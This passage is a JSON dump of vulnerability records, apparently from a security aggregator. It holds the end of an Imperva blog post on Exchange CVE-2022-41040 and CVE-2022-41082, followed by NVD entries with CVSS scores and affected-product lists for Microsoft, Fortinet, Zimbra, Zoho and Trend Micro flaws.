CVE-2021-34473. The request string disclosed from the recent exploit is identical to that of last year\u2019s vulnerability, and the mitigation provided by Microsoft is the same as well.\n\nImperva Threat Research has observed considerable related attacker activity targeting last year\u2019s ProxyShell vulnerability (CVE-2021-34473) recently. Threat Research rules and policies may also be picking up attacks targeting the new exploits (CVE-2022-41040 and CVE-2022-41082).\n\n[GTSC](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>), the company who discovered these vulnerabilities in August, believes that a Chinese threat actor may be behind the attacks observed so far. Per GTSC, the attacks include a Chinese character encoding and the China Chopper webshell for persistent remote access, which is a backdoor commonly used by likely state-sponsored Chinese hacking groups.\n\nGiven existing blocking rules that mitigate the CVE-2021-34473 proxyshell vulnerabilities, these new CVEs are mitigated out of the box by both Imperva Cloud WAF and WAF Gateway. If customers wish to implement a manual mitigation based on the advisory from Microsoft, it can be found [here](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>). Microsoft noted that the CVEs only impact on-premise Exchange servers, so Exchange Online Customers do not currently need to take any action.\n\nAs always, Imperva\u200b\u200b Threat Research continues to monitor the situation and will provide updates as new information emerges.\n\nThe post [Microsoft Exchange Server Vulnerabilities CVE-2022-41040 and CVE-2022-41082](<https://www.imperva.com/blog/microsoft-exchange-server-vulnerabilities-cve-2022-41040-and-cve-2022-41082/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T16:47:34", "type": "impervablog", "title": "Microsoft Exchange Server Vulnerabilities CVE-2022-41040 and CVE-2022-41082", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T16:47:34", "id": "IMPERVABLOG:2303181B17E64D6C752ACD64C5A2B39C", "href": "https://www.imperva.com/blog/microsoft-exchange-server-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:41:57", "description": "Improper validation of some components used by the rollback mechanism in Trend Micro Apex One and Trend Micro Apex One as a Service clients could allow a Apex One server administrator to instruct affected clients to download an unverified rollback package, which could lead to remote code execution. Please note: an attacker must first obtain Apex One server administration console access in order to exploit this vulnerability.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-19T18:15:00", "type": "cve", "title": "CVE-2022-40139", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-40139"], "modified": "2022-09-21T18:43:00", "cpe": ["cpe:/a:trendmicro:apex_one:-", "cpe:/a:trendmicro:apex_one:2019"], "id": "CVE-2022-40139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40139", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:trendmicro:apex_one:2019:*:*:*:*:*:*:*", "cpe:2.3:a:trendmicro:apex_one:-:*:*:*:*:saas:*:*"]}, {"lastseen": "2023-02-09T14:43:35", "description": "Microsoft Office Information Disclosure Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-41043", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41043"], "modified": "2022-12-05T20:23:00", "cpe": ["cpe:/a:microsoft:office:2019", "cpe:/a:microsoft:office_long_term_servicing_channel:2021"], "id": "CVE-2022-41043", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41043", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:macos:*:*", "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:macos:*:*"]}, {"lastseen": "2023-02-09T14:33:17", "description": "Zoho ManageEngine Password Manager Pro before 12101 and PAM360 before 5510 are vulnerable to unauthenticated remote code execution. (This also affects ManageEngine Access Manager Plus before 4303 with authentication.)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-19T15:15:00", "type": "cve", "title": "CVE-2022-35405", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-35405"], "modified": "2022-11-05T02:45:00", "cpe": ["cpe:/a:zohocorp:manageengine_pam360:5.5", "cpe:/a:zohocorp:manageengine_password_manager_pro:12.1", "cpe:/a:zohocorp:manageengine_access_manager_plus:4.3"], "id": "CVE-2022-35405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-35405", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_pam360:5.5:build5500:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_password_manager_pro:12.1:build12100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_access_manager_plus:4.3:build4302:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:37:56", "description": "Microsoft Office Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-38048", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-38048"], "modified": "2022-10-12T19:04:00", "cpe": ["cpe:/a:microsoft:office_long_term_servicing_channel:2021", "cpe:/a:microsoft:365_apps:-", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2019", "cpe:/a:microsoft:office:2016"], "id": "CVE-2022-38048", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-38048", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:microsoft:office:2019:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2019:*:*:*:*:macos:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:rt:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:-:*:*:*", "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:macos:*:*", "cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*", "cpe:2.3:a:microsoft:office_long_term_servicing_channel:2021:*:*:*:*:-:*:*", "cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:37:42", "description": "Azure Arc-enabled Kubernetes cluster Connect Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-37968", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-37968"], "modified": "2022-10-12T15:06:00", "cpe": ["cpe:/a:microsoft:azure_arc-enabled_kubernetes:1.6.19", "cpe:/a:microsoft:azure_stack_edge:-", "cpe:/a:microsoft:azure_arc-enabled_kubernetes:1.7.18", "cpe:/a:microsoft:azure_arc-enabled_kubernetes:1.8.11", "cpe:/a:microsoft:azure_arc-enabled_kubernetes:1.5.8"], "id": "CVE-2022-37968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37968", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:microsoft:azure_arc-enabled_kubernetes:1.6.19:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_arc-enabled_kubernetes:1.7.18:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_arc-enabled_kubernetes:1.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_arc-enabled_kubernetes:1.8.11:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_stack_edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:44:04", "description": "An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavisd automatically prefers it over cpio.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T02:15:00", "type": "cve", "title": "CVE-2022-41352", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41352"], "modified": "2022-11-09T20:42:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-41352", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41352", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:29:21", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 15.6.1 and iPadOS 15.6.1, macOS Monterey 12.5.1. An application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-24T20:15:00", "type": "cve", "title": "CVE-2022-32894", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-32894"], "modified": "2022-12-07T03:02:00", "cpe": [], "id": "CVE-2022-32894", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-32894", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2023-02-09T14:43:35", "description": "Windows COM+ Event System Service Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-41033", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41033"], "modified": "2022-10-13T15:26:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_11:22h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h2"], "id": "CVE-2022-41033", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41033", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:22h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:22h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:31:52", "description": "Windows CryptoAPI Spoofing Vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-34689", "cwe": ["CWE-290"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-34689"], "modified": "2022-10-12T14:44:00", "cpe": ["cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h2"], "id": "CVE-2022-34689", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-34689", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*"]}, {"lastseen": "2023-02-09T14:30:14", "description": "Windows TCP/IP Driver Denial of Service Vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-33645", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-33645"], "modified": "2022-10-12T14:42:00", "cpe": ["cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_11:22h2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h2"], "id": "CVE-2022-33645", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-33645", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:22h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:22h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*"]}, {"lastseen": "2023-02-09T14:37:44", "description": "Active Directory Certificate Services Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-11T19:15:00", "type": "cve", "title": "CVE-2022-37976", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-37976"], "modified": "2022-10-12T18:29:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2022-37976", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37976", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:43:06", "description": "An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-18T14:15:00", "type": "cve", "title": "CVE-2022-40684", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-40684"], "modified": "2022-10-20T19:06:00", "cpe": ["cpe:/a:fortinet:fortiswitchmanager:7.0.0", "cpe:/a:fortinet:fortiproxy:7.2.0", "cpe:/a:fortinet:fortiswitchmanager:7.2.0"], "id": "CVE-2022-40684", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-40684", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:fortinet:fortiswitchmanager:7.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:fortinet:fortiproxy:7.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:fortinet:fortiswitchmanager:7.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:43:34", "description": "Microsoft 